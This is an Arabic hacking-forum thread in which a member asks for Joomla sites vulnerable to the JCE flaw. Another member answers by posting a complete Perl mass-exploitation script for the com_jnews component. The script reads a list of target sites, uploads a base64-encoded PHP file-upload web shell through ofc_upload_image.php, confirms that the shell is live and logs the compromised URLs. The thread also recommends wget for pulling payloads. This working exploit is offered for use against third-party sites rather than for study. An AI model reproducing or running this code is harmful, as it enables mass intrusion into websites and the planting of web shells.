حالة الموضوع:
مغلق
  1. Erorr Salawi 404

    Erorr Salawi 404 DeveloPer Plus

    الأنتساب:
    ‏7 يوليو 2014
    المشاركات:
    103
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    ممكن مواقع جوملة مصابة بتغرة jce لانني لم اجدها وايضا الدوركات لا تعمل بدون جدوا
     
  2. Pro.Mast3r

    Pro.Mast3r V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    student
    الإقامة:
    IraQ/Nasiriyah
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي

    • اولا : الموضوع في القسم الخطأ .

    • ثانيا : ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP

    • حاول تجد ثغرات اخرى مثل RCI , SQL .
     
  3. TeePlow

    TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    السلام عليكم
    ينقل للقسم الصحيح
    ثانيا مثل ما قال الاخ :
    ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP
     
  4. Erorr Salawi 404

    Erorr Salawi 404 DeveloPer Plus

    الأنتساب:
    ‏7 يوليو 2014
    المشاركات:
    103
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اوكي وكيف استغل تغرة rci
     
  5. Pro.Mast3r

    Pro.Mast3r V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    student
    الإقامة:
    IraQ/Nasiriyah
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي ثغرات عباره عن استغلال امري
    يعني تستطيع تنفيذ امر عن طريقها
    ومايفيدك هو امر الاستدعاء
    wget

    والثغره منتشره في اضافات الجوملا

    مثل

    • com_jnewsletter
    هذه اداه بيرل
    لااستغلال الثغره
    كود PHP:
    #!/usr/bin/perl
    # Module Needed :)
    use strict;
    no warnings;
    use 
    threads;
    use 
    threads::shared;
    use 
    LWP::UserAgent;
    use 
    HTTP::Request;
    use 
    LWP::Simple;
    use 
    HTTP::Request::Common;
    use 
    Term::ANSIColor;
    use 
    Win32::Console::ANSI;
    use 
    MIME::Base64;
    ##############################
    if($^=~ /Win/){
    system("cls");
    }else{
    system("clear");
    }
    my $ua LWP::UserAgent->new;
    $ua->timeout(15);
    $ua->agent('Mozilla/5.0');
    print 
    color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
    print 
    color("bold red"),"[+] coded by Mr_AnarShi-T\n";
    print 
    color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
    print 
    color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
    print 
    color 'reset';
    print 
    color("green"),"[+] Enter File : ";
    print 
    color 'reset';
    my $file=<STDIN>;
    chomp($file);
    print 
    color("green"),"\n[+] Enter Thread Number : ";
    print 
    color 'reset';
    my $thread=<STDIN>;
    chomp($thread);
    my $threads $thread;
    my @linkz shared;
    my @paths shared;
    GetLinks();
    while (
    threads->list) {}
    print 
    color ('green');
    print 
    "\n[+] Link Founded : ";
    print 
    color 'reset';
    print
    "".scalar(@linkz)."\n\n";
    CheckLinks();
    while (
    threads->list) {}
    sub GetLinks {
    openLNK"$file) or die "$!\n";
    while( 
    definedmy $line_ = <LNK> ) ) {
    chomp$line_ );
    push( @linkz$line_ );
    }
    closeLNK );
    }
    sub CheckLinks {
    foreach 
    my $link( @linkz ) {
    my $ctr 0;
    foreach 
    my $thr threads->list ) { $ctr++; }
    if (
    $ctr $threads){
    threads->create( \&CheckLinkz_exploits,$link );
    }
    else { 
    redo; }
    }
    }
    sub CheckLinkz_exploits {
    my $link shift ;
    chomp ($link);
    my $site_vul "http://".$link "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
    my $encoded "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVj​aG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRh​dGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJm​aWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIN​CmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAi​VXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAk​X0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9i​Pjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+​PGJyPjxicj4nOyB9DQp9DQo/Pg==";
    my $evil decode_base64($encoded);
    my $res $ua->request(POST $site_vul,Content_Type => 'text/plain'Content => $evil);
    print 
    "[+] Checking $link\n\n";
    if (
    $res->is_success){
    print 
    "[+] $link is vul\n";
    print 
    "[+] Checking If The Evil code Was Uploded\n";
    my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
    my $url "http://".$link$vul;
    my $request HTTP::Request->new(GET=>$url);
    my $useragent LWP::UserAgent->new();
    my $response $useragent->request($request);
    if (
    $response->content=~m/<title>Upload Files Mr_AnarShi-<\/title>/g){
    print 
    color("yellow"),"[.] Found => $url\n\n";
    print 
    color 'reset';
    open(BEN,">>result-$link.txt");
    print 
    BEN "$url\n";
    close(BEN);
    }
    else
    {
    print 
    "[.] Not Found \n";
    }
    }
    threads->detach();
    موفق .~
     
  6. sєиɪσя нσssαм

    sєиɪσя нσssαм ★ Abu Nabil ★ V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    202
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    18
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    يتم آختيآر آفضل رد لعدم آهتمآم العضو بآلطلب المطروح
    بعد آذن الجميع يغلق الموضوع للآنتهآء
    )5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة